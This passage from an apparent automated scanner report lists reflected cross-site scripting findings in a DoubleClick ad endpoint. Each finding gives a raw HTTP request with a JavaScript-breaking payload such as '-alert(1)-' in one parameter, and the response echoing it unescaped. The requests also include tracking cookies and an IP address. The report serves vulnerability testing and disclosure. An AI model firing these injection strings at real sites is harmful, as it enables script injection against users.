GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cnba10d"-alert(1)-"8bda0c8c53d&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/y%3B240046691%3B1-0%3B0%3B61212128%3B4307-300/250%3B41645535/41663322/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cnba10d"-alert(1)-"8bda0c8c53d&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=20
...[SNIP]...

3.416. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0342'-alert(1)-'11a72795243 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cnb0342'-alert(1)-'11a72795243&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/o%3B240046691%3B3-0%3B0%3B61212128%3B4307-300/250%3B41645537/41663324/1%3B%3B%7Ess
...[SNIP]...
k.net/click%3Bh%3Dv8/3af6/17/14a/%2a/o%3B240046691%3B3-0%3B0%3B61212128%3B4307-300/250%3B41645537/41663324/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cnb0342'-alert(1)-'11a72795243&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=20
...[SNIP]...

3.417. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0924'-alert(1)-'d944fb3d328 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=f0924'-alert(1)-'d944fb3d328&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/o%3B240046691%3B3-0%3B0%3B61212128%3B4307-300/250%3B41645537/41663324/1%3B%3B%7Ess
...[SNIP]...
%3Bh%3Dv8/3af6/17/14a/%2a/o%3B240046691%3B3-0%3B0%3B61212128%3B4307-300/250%3B41645537/41663324/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=f0924'-alert(1)-'d944fb3d328&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23
...[SNIP]...

3.418. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bde3f"-alert(1)-"c3f8f3fe10d was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=bde3f"-alert(1)-"c3f8f3fe10d&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/t%3B240046691%3B0-0%3B0%3B61212128%3B4307-300/250%3B41645533/41663320/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=bde3f"-alert(1)-"c3f8f3fe10d&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23
...[SNIP]...

3.419. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0965"-alert(1)-"e52ba1707a0 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113a0965"-alert(1)-"e52ba1707a0&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/t%3B240046691%3B0-0%3B0%3B61212128%3B4307-300/250%3B41645533/41663320/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113a0965"-alert(1)-"e52ba1707a0&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/",
site
...[SNIP]...

3.420. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 659b7'-alert(1)-'48c5b44a640 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113659b7'-alert(1)-'48c5b44a640&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/g%3B240046691%3B2-0%3B0%3B61212128%3B4307-300/250%3B41645536/41663323/1%3B%3B%7Ess
...[SNIP]...
/g%3B240046691%3B2-0%3B0%3B61212128%3B4307-300/250%3B41645536/41663323/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113659b7'-alert(1)-'48c5b44a640&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/http://sp
...[SNIP]...

3.421. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af2e8'-alert(1)-'d21b133853f was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253Aaf2e8'-alert(1)-'d21b133853f&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/o%3B240046691%3B3-0%3B0%3B61212128%3B4307-300/250%3B41645537/41663324/1%3B%3B%7Ess
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/o%3B240046691%3B3-0%3B0%3B61212128%3B4307-300/250%3B41645537/41663324/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253Aaf2e8'-alert(1)-'d21b133853f&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt
...[SNIP]...

3.422. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86249"-alert(1)-"a39acd29383 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A86249"-alert(1)-"a39acd29383&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/y%3B240046691%3B1-0%3B0%3B61212128%3B4307-300/250%3B41645535/41663322/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A86249"-alert(1)-"a39acd29383&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt
...[SNIP]...

3.423. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61e01"-alert(1)-"f6a94de6365 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=61e01"-alert(1)-"f6a94de6365&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/n%3B240046691%3B7-0%3B0%3B61212128%3B4307-300/250%3B41645543/41663330/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=61e01"-alert(1)-"f6a94de6365&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/",
siteId: "794364",
placementId: "61212128"
};

document.write('\n\n<sc
...[SNIP]...

3.424. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 361f7'-alert(1)-'dcec69549d0 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=361f7'-alert(1)-'dcec69549d0&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/z%3B240046691%3B5-0%3B0%3B61212128%3B4307-300/250%3B41645541/41663328/1%3B%3B%7Ess
...[SNIP]...
8/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=361f7'-alert(1)-'dcec69549d0&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/http://spongecell.com/api/placements/46405556/clickthrough?noflash=true&noscri
...[SNIP]...

3.425. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 364ee"-alert(1)-"92d1173afce was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=364ee"-alert(1)-"92d1173afce&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/z%3B240046691%3B5-0%3B0%3B61212128%3B4307-300/250%3B41645541/41663328/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=364ee"-alert(1)-"92d1173afce&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/",
siteId: "794364",
placementId: "61212128"
};

document.wri
...[SNIP]...

3.426. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

